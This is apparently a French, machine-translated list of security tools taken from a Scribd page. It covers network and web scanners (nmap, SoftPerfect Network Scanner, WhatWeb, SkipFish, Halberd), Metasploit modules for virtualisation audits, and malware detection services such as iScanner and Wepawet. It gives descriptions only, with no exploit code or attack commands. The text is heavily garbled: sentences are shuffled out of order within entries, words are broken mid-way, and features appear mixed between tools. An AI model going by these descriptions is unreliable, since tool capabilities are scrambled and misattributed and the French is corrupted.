vous permettre d'accéder à l'interface HTTP.Détecter les XSS.pl TARGET_FILE TCP_PORT PROJECT_NAME fichier_sortie RIPS http://sourceforge. Pr incipales caractéristiques: * Grande vitesse: le code C pure. Ses modules Perl nécessaires sont: LWP:: Simple LWP:: UserAgent HTML:: TagParser URI:: Fetch HTTP:: Cookies Exemple de syntaxe: praeto. empreinte mi . L'objectif principal de l'outil est de faire des balayages répétés plus efficace SkipFish http://code. Dossier d'information. et de faire une copie de configuration! Cela pourrait vous permettre de continuer à voir les entra illes! En bref. SQLI.5 niveaux de verbosité pour le débogage de votre analyse des résultats .

SoftPerfect Network Scanner peut aussi vérifier un port défini par l'utilisateur et de rendre compte si l'on est ouvert. disponibilité. XML.com/products/networkscanner/ SoftPerfect Network Scanner est un logiciel gratuit IP multi-thread. CSV et TXT * Supporte le Wake-On-LAN. * Récupère potentiellement toute l'information via WMI. etc * Vous pouvez monter et d'explorer les ressources du réseau. filtrer la liste des résultats et plus encor e. parcourir avec l'Explorateur Windows. Elle peut aussi résoudre les noms d'hôte et auto-détecter votre portée locale et IP externe. En outre. Exportations des résultats au format HTML. comptes d'utilisateurs configurés . faible de faux positifs. * Récupère actuellement connecté sur les utilisateurs. sur la volée création liste de mots.org/ VASTO est un Virtualization Assessment Toolkit. MacOS X et Windows (Cygwin ) environnements. un ensemble de modules Metasploi t destiné à être utilisé comme un outil de test pour effectuer des tests de pénétration ou d 'audit de sécurité des solutions de virtualisation. capable de repérer une série de défauts subtils. * Détecte les adresses MAC du matériel. les contrôle s de sécurité différentiel. L'outil est considéré comme le support de Linux. * Facilité d'utilisation: heuristiques pour soutenir une variété de cadres web origina ux et sites à technologie mixte. analyse pour l'écoute des ports TCP / UDP et affiche les types de ressources sont partagées sur le réseau (y compri s le système et cachés). * Récupère les informations du Registre à distance. avec des capacités d'apprentissage automatique. * Il est absolument gratuit. * Peut lancer des applications externes de tiers.nimale du CPU . Il prend en charge l'arrêt à distance e t de Wake-On-LAN. * Logique de sécurité de pointe: de haute qualité. et l'autocomplétion forme. NetBIOS et SNMP scanner avec une interface moderne et de nombreuses fonctionnalités avancées. UDP et certains services SNMP. FreeBSD. même à travers des routeurs. Whatweb . * Scans pour écouter les ports TCP. y compris les v ecteurs d'injection aveugles. SoftPerfect Network Scanner http://www. Vasto http://vasto. Les pings programme ordinateurs. ne nécessite aucune installation et ne contient aucun adware / spyware / malware. * Détecte les dossiers cachés partagés et ceux en écriture. Il a été parrainé par réseau sécurisé et prend les contributions des camarades hackers. * Détecte votre internes et externes des adresses IP. Principales caractéristiques * Pings ordinateurs et affiche ceux qui sont vivants.nibblesec. système de fichiers et de gestionnai re de services. l'arrêt à distance et les messages du réseau d'envoi.softperfect. il vous permet de monter les dossiers partagés comme des lecteurs réseau.facilement atteindre 2000 requêtes par seconde avec des objectifs adaptés. I l est destiné aux administrateurs système et les utilisateurs en général intéressés par la sé urité informatique.

* Formats de journaux multiples: Mémoire (greppable). WhatWeb identifie ég alement les numéros de version. Ils reçoivent des demandes HTTP et les rediriger vers les vrais serveurs web afin de partager le trafic entre eux. les serveurs Web et les appareils embarqués. RubyObject. y compris TOR * En-têtes HTTP * Une authentification HTTP basique * Le contrôle de redirection web * Nmap style plages d'adresses IP * Fuzzy correspondant * Résultat de sensibilisation certitude * Custom plugins défini sur la ligne de commande hallebarde http://halberd. est le plus rapide et ne nécessit e qu'une seule requête HTTP d'un site web. Ceci est approprié pour la numérisation des sites Web publics. la plupart des sites WordPress peuvent êtr e identifiés par le méta-tag HTML. par exemple ''.http://www. Pour faire face à des charges de trafic lourd. bibliothèques JavaScript.com/research/whatweb WhatWeb identifie les sites Web. Ces machines se cacher (éve ntuellement) de nombreux serveurs web se cache derrière une adresse IP virtuelle. adresses e-mail. . ou approfondie. Hallebarde est un outil visant à découvrir de véritables serveurs derrière des adresses IP virtuelles. l'opération comprend de nombreux indices de ce que les technologies du web sont alimenter ce site. les pages de connexion et de contrôl e pour «/ wp-content /" dans les liens relatifs. WhatWeb peut interroger le site Web de plus . qui comprennent la vérification de la f avicon. plateformes de blogs. dite «passive».superadditive. WhatWeb a pl us de 900 plugins.com/ Hallebarde découvre les équilibreurs de charge HTTP. Lorsque vous visitez un site Web dans votre navigateur. WhatWeb peut être furtif et rapide. et plus encore. des identifiants. mais lente. mais cela ne nuit pas à WhatWeb. des modules fra mework web. * Web récursive spidering * Proxy soutien. Il est utile pour l'audit de sécu rité des applications web et pour les tests d'équilibrage de la charge de configurat ion. Verbose (lisible par l'homme ). WhatWeb reconnaît les technologies Web. Caractéristiques: * Plus de 900 plugins * Contrôle le compromis entre la vitesse / furtivité et la fiabilité Plugins * comprennent par exemple les URL * Optimisation de la performance. statistiques / packages d'analyse. y compris les systèmes de ge stion de contenu (CMS). P arfois d'une visite unique page web contient des informations suffisantes pour i dentifier ces sites mais si elle ne. Son but est de répondre à la question: «Qu'est-ce que ce site Web?". les fichiers d'installation par défaut. Contrôle le nombre de sites à analyser en même temps . Le niveau par défaut de l'agression. La plupart des plugins sont WhatWeb approfondie et reconnaître une gamme d'indices du plus subtil au évidente. les administrateurs de site Web.WhatWeb prend en ch arge une agression de niveau pour contrôler le commerce entre la vitesse et la fia bilité. MagicTree. XML. modes les plus agressifs ont été développés pour les tests de pénétratio n.morningstarsecurity. Le Wh atWeb plugin WordPress a plus de 15 tests. JSON. chacun à reconnaître quelque chose de différent. so uvent installer des dispositifs d'équilibrage de charge. Mais une minorité de sites WordPres s supprimer cette étiquette d'identification. Par exemple. MongoDB. des erreurs SQL.

quels services (nom de l'application et la version) ces hôtes offrent.com/p/nmapsi4/ Nmapsi4 est un système complet basé sur Qt4 Gui avec les objectifs de conception pou r fournir une interface utilisateur complète pour nmap.org/ iScanner est un outil gratuit open source vous permet de détecter et supprimer les codes malveillants et des pages web les virus de votre serveur Linux / Unix aut omatiquement et facilement. Il affiche tous les ports d'un réseau ouvert (TCP / UDP) et les connexions réseau actives pour chaque processus. en vue de la gestion du sc anner toutes les options de sécurité de ce puissant net! procnetmonitor http://securityxploded. ge stion des plannings de mise à niveau de service et d'accueil de surveillance ou de disponibilité de service. Nmap utilise des paquets IP de façon novatrice pour détermi ner quels hôtes sont disponibles sur le réseau. mais fonctionne très bien sur une cible unique. Possibilité de nettoyer les pages web infectées automatiquement. Caractéristiques actuelles: * . et des dizaines d'autres caractéristiques.0. Envoyer des rapports par email. scanner rapide * avec de bonnes performances.iScanner http://iscanner.com/procnetmonitor. Il a avancé la couleur système basé analyse automatique pour le rendre facile de distinguer les processus . ActiveX et les objets codes PHP.google. vérifier plus tard pour les m ises à jour. ils sont en cours d'exécution.php ProcNetMonitor est l'outil gratuit pour surveiller l'activité réseau de tous les pro cessus en cours dans le système. Facilité de sauvegarde et de restauration du système pour les fichiers infectés. * Très options flexible et facile à utiliser.org/ Nmap ("Network Mapper") est un libre et open source (licence) utilitaire pour l' exploration du réseau ou l'audit de sécurité. nmapsi4 http://code. Nm ap fonctionne sur tous les principaux systèmes d'exploitation informatique et offi cielle paquetages binaires sont disponibles pour Linux. ce type de filtres de paquets / pare-feu sont en co urs d'utilisation. De nombreux systèmes et les administrateur s réseau trouverez également utile pour des tâches telles que l'inventaire de réseau. Log approfondies démontrent les fichiers infectés et les codes malveillants. * Oui. Possibilité de mettre à jour la base de données et le programme facilement à partir de serveur dédié. Windows et Mac OS X. Il a été conçu pour parcou rir rapidement de grands réseaux. Simple et base de données modifiable en fonction de signature. les systèmes d'exploitation (et leurs versions). * * * * * * Codes malveillants Détection de pages Web. VBScript. Cette inclure des balises iframe cachée JavaScript. c'est GRATUIT! nmap http://nmap.isecur1ty. Cet outil est programmé par iSecur1ty en utilisant un langage de programmation Rub y et il est disponible sous les termes de la GNU Affero General Public License 3 . S'il vous plaît noter que ce site est en construction.

et fil PDF . Sites web URLvoid http://www.com/ Wepawet http://wepawet.php Wepawet est un service pour la détection et l'analyse des logiciels malveillants s ur le Web. Il est également liv ré avec fonction d'exportation pour enregistrer la liste complète des processus de p ort à un fichier HTML standard pour l'analyse hors-ligne. Toutes ces caractéristiques combinées font outil très efficace dans la lutte contre le s chevaux de Troie et spywares installés sur le système qui envoient en continu des touches de clavier. les données de compte en ligne et autres informations sensible s à un serveur distant. Il gère actuellement Flash.org/index. JavaScript. Nouvelle version présent e également caractéristique unique "Port Finder" qui le rend facile à rechercher port particulier dans tous les processus en cours en un seul clic.réseau orienté des autres avec un seul coup d'œil sur la liste.urlvoid.iseclab.

Master your semester with Scribd & The New York Times

Special offer for students: Only $4.99/month.

Master your semester with Scribd & The New York Times

Cancel anytime.